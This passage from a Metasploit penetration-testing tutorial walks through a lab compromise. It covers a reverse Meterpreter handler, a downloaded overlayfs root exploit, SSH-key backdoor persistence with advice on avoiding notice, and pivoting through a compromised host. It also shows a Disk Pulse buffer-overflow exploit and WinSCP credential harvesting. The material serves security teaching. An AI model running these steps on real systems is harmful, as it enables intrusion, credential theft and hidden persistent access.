exploit/multi/handler module, set the same payload, LHOST, and LPORT we used in
reverse_connect.elf, and run the module using the
-j switch. The -j switch starts the handler in background mode as a job, so it can handle multiple connections, all in the background.
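The handler setup can be sketched as:

```
msf > use exploit/multi/handler
msf > set payload linux/x64/meterpreter/reverse_tcp
msf > set LHOST 192.168.174.128   # illustrative; must match the payload's LHOST
msf > set LPORT 4444              # illustrative; must match the payload's LPORT
msf > exploit -j                  # run in the background as a job
```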
We have successfully set up the handler. Next, we just need to execute the payload file on the target, as shown in the following screenshot:
We can see that we just dropped in a shell using the shell command. We checked the current working directory on the target using the
pwd command. Next, we gave executable permissions to the payload file so we can execute it and finally, we ran the
reverse_connect.elf executable in the background using the
& identifier. The preceding screenshot shows that as soon as we run the executable, a new Meterpreter session gets opened to the target system. Using the
sessions -i command, we can see that we now have two Meterpreters on the target:
However, the x64/Linux Meterpreter is apparently a better choice over the PHP Meterpreter, and we will continue interacting with the system through it unless we gain a more privileged Meterpreter. If anything goes unplanned, we can switch access to the PHP Meterpreter and re-run this payload like we just did. An important point here is that even though we now have a better type of access to the target, we are still a low-privileged user, and we would like to change that. The Metasploit framework incorporates an excellent module called
local_exploit_suggester, which aids privilege escalation. It has a built-in mechanism to check various kinds of local privilege escalation exploits and will suggest the best one to use on the target. We can load this module, as shown in the following screenshot:
We loaded the module using the
use command followed by the absolute path of the module, which is
post/multi/recon/local_exploit_suggester. Since we want to use this exploit on the target, we will naturally choose the better Meterpreter to route our checks through. Hence, we set SESSION to
2, which is the identifier for the x64/Linux Meterpreter. Let's run the module and analyze the output:
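The steps above can be sketched as:

```
msf > use post/multi/recon/local_exploit_suggester
msf > set SESSION 2
msf > run
```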
Simply amazing! We can see that the
suggester module states that the
overlayfs_priv_esc local exploit module from the
exploit/linux directory can be used on the target to gain root access. However, I leave running the module itself as an exercise for you to complete. Instead, let's do it manually by downloading the local root exploit onto the target, compiling it, and executing it to get root access on the target system. We can download the exploit from: https://www.exploit-db.com/exploits/37292. However, let's gather some details about this exploit in the next section.
The overlayfs privilege escalation vulnerability allows local users to gain root privileges by leveraging a configuration in which
overlayfs is permitted in an arbitrary mount namespace. The weakness exists because the implementation of
overlayfs does not correctly check permissions for file creation in the upper filesystem directory.
More on the vulnerability can be found here: https://www.cvedetails.com/cve/cve-2015-1328.
Let's drop into a shell and download the raw exploit onto the target from https://www.exploit-db.com/:
Let's save the exploit as
37292.c and compile it with
gcc, which will generate an executable, as shown in the following screenshot:
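From a shell on the target, the download-and-compile steps would look roughly like this (the exploit-db URL and the output file name are assumptions; the site may require fetching the raw source by another route):

```
wget https://www.exploit-db.com/raw/37292 -O 37292.c   # fetch the raw exploit source
gcc 37292.c -o ofs                                     # compile to an executable
./ofs                                                  # run; on success it spawns a root shell
```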
Bingo! As we can see, by running the exploit, we have gained access to the root shell; this marks the total compromise of this system. Let's run some of the basic commands and confirm our identity as follows:
Remember, we have an exploit handler running in the background? Let's run the same reverse_connect.elf payload again, this time from the root shell:
We can see that we have the third Meterpreter from the target system. However, the UID, that is, the user ID, is
0, which denotes the root user. Hence, this Meterpreter is running with root privileges and can provide us unrestricted access to the entire system. Let's interact with the session using the
sessions -i command followed by the session identifier, which is
3 in this case:
We can confirm the root identity through the
getuid command, as shown in the preceding screenshot. We now have complete authority over the system, so what's next?
Keeping access to the target system is a desired feature, especially for law enforcement agencies or for red teams testing defenses deployed on the target. We can achieve persistence through Metasploit on a Linux server using the
sshkey_persistence module from the
post/linux/manage directory. This module adds our SSH key, or creates a new one, and adds it to all the users on the target server. Therefore, the next time we want to log in to the server, it will never ask us for a password and will simply let us in with the key. Let's see how we can achieve this:
We just need to set the session identifier using the set
SESSION command followed by the session identifier. We will make use of the session with the highest level of privileges. Hence, we will use
3 as the
SESSION identifier and directly run the module as follows:
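The module usage can be sketched as:

```
msf > use post/linux/manage/sshkey_persistence
msf > set SESSION 3   # the root-privileged Meterpreter session
msf > run
```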
We can see that the module created a new SSH key and then added it to two users on the target system, that is, root and
claire. We can verify our backdoor access by connecting to the target over SSH with either
root or the user
claire, or both, as follows:
Amazing! We can see that we logged into the target system by making use of the newly created SSH key using the
-i option, as shown in the preceding screen. Let's see if we can also log in as the user claire:
Yup! We can log in with both of the backdoored users.
Most servers do not permit root login. Hence, you can edit the
sshd_config file, set the PermitRootLogin option to
yes, and restart the SSH service on the target.
Try to backdoor only a single user, such as root, since most folks won't log in as root (default configurations prohibit it), so the backdoor key is less likely to be noticed.
No matter what operating system we have compromised, Metasploit offers dozens of post-exploitation reconnaissance modules which harvest gigs of data from the compromised machine. Let's make use of one such module:
Running the enum_configs post-exploitation module, we can see that we have gathered all the configuration files present on the target. These configs help uncover passwords, password patterns, information about running services, and much more. Another great module is
enum_system, which harvests information such as OS-related information, user accounts, running services, cron jobs, disk information, log files, and much more, as shown in the following screenshot:
Having gathered an enormous amount of detail on the target, is it a good time to start reporting? Not yet. A good penetration tester gains access to the system, obtains the highest level of access, and presents their analysis. However, a great penetration tester does the same but never stops at a single system. They will try to the best of their abilities to dive into the internal network and gain more access to it (if allowed). Let's use some commands which will aid us in pivoting to the internal network. One such example is
arp, which lists all the contacted systems in the internal network:
We can see the presence of a separate network, which is in the
192.168.116.0 range. Let's issue the
ifconfig command and see if there is another network adapter attached to the compromised host:
Yup! We got it right: there is another network adapter (
Interface 3) which is connected to a separate network range. However, when we try to ping or scan this network from our address range, we are not able to, because the network is unreachable from our IP address. This means we need a mechanism that can forward data from our system to the otherwise inaccessible target range through the compromised host itself. We call this arrangement pivoting. Therefore, we will add a route to the target range through our Meterpreter on the system, and the target systems in the range will see our compromised host as the originator. Let's add a route to the otherwise unreachable range through Meterpreter, as shown in the following screenshot:
Using the autoroute post-exploitation module from the
post/multi/manage directory, we need to specify the target range in the
SUBNET parameter and
SESSION to the session identifier of the Meterpreter through which data would be tunneled. We can see that by running the module, we have successfully added a route to the target range. Let's run the TCP port scanner module from Metasploit and analyze whether we can scan hosts in the target range or not:
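The routing setup can be sketched as follows (the session identifier is illustrative; use the Meterpreter you want to tunnel through):

```
msf > use post/multi/manage/autoroute
msf > set SUBNET 192.168.116.0
msf > set SESSION 3
msf > run
```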
We simply run the port scanner module against the target we found using the
arp command, that is,
192.168.116.133, with ten threads for ports 1-10000, as shown in the preceding screenshot:
Success! We can see that port
80 is open. However, our access is limited through Meterpreter only. We need a mechanism where we can run some of our external tools for browsing port
80 through a web browser to understand more about the target application running on port
80. Metasploit offers an inbuilt socks proxy module which we can run and route traffic from our external applications to the target
192.168.116.133 system. Let's use this module as follows:
We simply need to run the
socks4a module residing at the
auxiliary/server path. It will set up a gateway on the local port,
1080, to route the traffic to the target system. Proxying on
127.0.0.1:1080 will forward our browser traffic through the compromised host. However, for external tools, we will need to use
proxychains and configure it by setting the port to
1080. The port for
proxychains can be configured in the /etc/proxychains.conf file.
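On Kali Linux, proxychains reads its proxy list from /etc/proxychains.conf; the last lines of that file would be edited to point at our socks4a listener, roughly as follows:

```
# /etc/proxychains.conf -- [ProxyList] section
socks4  127.0.0.1 1080
```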
The next thing is to set this address as a proxy in the browser, or to use
proxychains as a prefix for all third-party command-line applications such as Nmap and Metasploit. We can configure the browser, as shown in the following screenshot:
Make sure to remove
127.0.0.1 from the
No Proxy for section. After setting the proxy, we can just browse to the IP address on port
80 and check whether we can reach the application:
Nice! We can see the application, which says it's a Disk Pulse Enterprise, Software v9.9.16, which is a known vulnerable version. We have plenty of modules for Disk Pulse in Metasploit. Let's make use of one of them, as follows:
The vulnerability lies in parsing the
GET request by the web server component of Disk Pulse 9.9.16. An attacker can craft malicious
GET requests and cause the SEH frame to overwrite, which will cause the attacker to gain complete access to the program's flow. The attacker will gain full access to the system with the highest level of privileges since Disk Pulse runs with Administrator rights.
Let's make use of the vulnerability and exploit the system as follows:
Merely by setting the
RHOST and the
LPORT (the gateway port which will give us access on successful exploitation of the target), we are ready to exploit the system. We can see that as soon as we run the exploit, Meterpreter session
5 opened, which marks a successful compromise of the target. We can verify our list of sessions using the
sessions -i command as follows:
For more information on the vulnerability, refer to: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13696.
It is always great to look for the various kinds of applications installed on the target system, since some of the apps may have saved credentials to other parts of the network. Enumerating the list of installed applications, we can see that we have WinSCP 5.7, which is a popular SSH and SFTP client. Metasploit can harvest saved credentials from WinSCP software. Let's run the
post/windows/gather/credentials/winscp module and check whether we have some of the saved credentials in the WinSCP software:
Amazing! We have recovered a saved credential for another host in the network, which is
192.168.116.134. The good news is the saved credentials are for the root account, so if we gain access to this system, it will be with the highest level of privilege. Let's use the found credentials in the
ssh_login module as follows:
Since we already know the username and password, let's set these options for the module along with the target IP address, as shown in the following screenshot:
Bingo! It's a successful login, and Metasploit has automatically gained a system shell on it. However, we can always escalate to a better quality of access using Meterpreter shells. Let's create another backdoor with
msfvenom as follows:
The backdoor will listen for connections on port
1337. However, how do we transfer this backdoor to the compromised host? Remember, we ran the socks proxy auxiliary module and made changes to the configuration? Using the
proxychains keyword as a prefix for most tools will force the tool to route through
proxychains. So, to transfer such a file, we can make use of
scp as shown in the following screenshot:
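The transfer can be sketched as follows; the backdoor file name and destination path are illustrative, and the root password is the one harvested from WinSCP:

```
proxychains scp backdoor.elf root@192.168.116.134:/tmp/
```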
We can see that we have successfully transferred the file. Running the matching handler, similar to what we did for the first system, we will receive the connection from the target. Let's have an overview of all the targets and sessions we gained in this exercise as follows:
Throughout this practical real-world example, we compromised three systems and gained the highest possible privileges on them through local exploits, human errors, and exploiting software that runs with the highest possible privileges.
The lab setup used in this exercise was as follows:
- Kali Linux VM image: Kali Rolling (2017.3) x64
- Target operating systems: Ubuntu 14.04 LTS and Ubuntu 16.04.3 LTS (xenial)
- Disk Pulse 9.9.16: enterprise disk management software
- WinSCP 5.7: SSH and SFTP client
- We started by conducting an Nmap scan on the target IP address, which is 192.168.174.132.
- The Nmap scan revealed that port 80 was open.
- Next, we fingerprinted the application running on port 80 and found Apache 2.4.7 running.
- We tried browsing to the HTTP port. However, we couldn't find anything.
- We ran the dir_scanner module to perform a dictionary-based check on the Apache server and found the PhpCollab application directory.
- We found an exploit module for PhpCollab using searchsploit and had to import the third-party exploit into Metasploit.
- Next, we exploited the application and gained limited user access to the target system.
- To improve our access mechanism, we uploaded a backdoored executable and achieved a better level of access to the target.
- To gain root access, we ran the local exploit suggester module and found that the overlayfs privilege escalation exploit would help us achieve root access on the target.
- We downloaded the overlayfs exploit from https://exploit-db.com/, compiled it, and ran it to gain root access to the target.
- Using the same previously generated backdoor, we opened another Meterpreter shell, but this time with root privileges.
- We added persistence to the system by using the sshkey_persistence module in Metasploit.
- Running the arp command on the target, we found that there was a separate network connected to the host, which is in the target range of 192.168.116.0.
- We added a route to this network by using the autoroute script.
- We scanned the system found via the arp command using the TCP port scanner module in Metasploit.
- We saw that port 80 of the system was open.
- Since we only had access to the target network through Meterpreter, we used the socks4a module in Metasploit to make other tools connect to the target through Meterpreter.
- Running the socks proxy, we configured our browser to utilize the socks4a proxy on port 1080.
- We opened 192.168.116.133 through our browser and saw that it was running the Disk Pulse 9.9.16 web server service.
- We searched Metasploit for Disk Pulse and found that it was vulnerable to an SEH-based buffer overflow vulnerability.
- We exploited the vulnerability and gained the highest level of privileges on the target since the software runs with SYSTEM-level privileges.
- We enumerated the list of installed applications and found that WinSCP 5.7 is installed on the system.
- We saw that Metasploit contains an inbuilt module to harvest saved credentials from WinSCP.
- We collected the root credentials from WinSCP and used the ssh_login module to gain a root shell on the target.
- We uploaded another backdoor to gain a Meterpreter shell with root privileges on the target.
Throughout this chapter, we introduced the phases involved in penetration testing. We also saw how we can set up Metasploit and conduct a penetration test on the network. We recalled the basic functionalities of Metasploit as well. We also looked at the benefits of using databases in Metasploit and pivoting to internal systems with Metasploit.
Having completed this chapter, we are equipped with the following:
- Knowledge of the phases of a penetration test
- The benefits of using databases in Metasploit
- The basics of the Metasploit framework
- Knowledge of the workings of exploits and auxiliary modules
- Knowledge of pivoting to internal networks and configuring routes to them
- Understanding of the approach to penetration testing with Metasploit
The primary goal of this chapter was to get you familiar with penetration test phases and the basics of Metasploit. This chapter focused entirely on preparing ourselves for the following chapters.
To make the most out of the knowledge gained from this chapter, you should perform the following exercises:
- Refer to the PTES standard and take a deep dive into all the phases of a business-oriented penetration test
- Use the overlayfs privilege escalation module within the Metasploit framework
- Find at least three different exploits which are not a part of the Metasploit framework, and load them into Metasploit
- Perform post-exploitation on a Windows 7 system and identify the five best post-exploitation modules
- Achieve persistence on Windows 7 by finding the correct persistence mechanism and check if any AV raises any flags while you do that
- Identify at least three persistence methods for Windows, Linux, and Mac operating systems
In the next chapter, we will dive deep into the wild world of scripting and building Metasploit modules. We will learn how we can build cutting-edge modules with Metasploit and learn how some of the most popular scanning and authentication testing scripts work.